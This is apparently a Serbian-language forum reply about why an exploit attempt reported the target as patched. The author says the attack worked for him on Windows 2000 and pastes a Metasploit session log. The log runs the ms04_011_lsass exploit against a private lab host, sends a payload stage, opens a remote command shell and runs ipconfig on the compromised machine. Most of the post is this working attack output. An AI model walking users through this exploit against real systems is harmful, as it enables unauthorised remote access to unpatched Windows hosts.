[*] Server appears to have been patched
Zar ovo ne govori dovoljno? Komp verovatno ima instaliran update koji krpi ovo rupu.
Inače ja sam probao na win2k serveru i radi, kao i ostali exploiti u metasploit framework-u.
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.77.4[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.77.4[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 2 opened (192.168.77.1:47460 -> 192.168.77.4:4444)
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.77.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\WINNT\system32>
"One machine can do work of fifty ordinary man. No machine can do work of one
extraordinary man."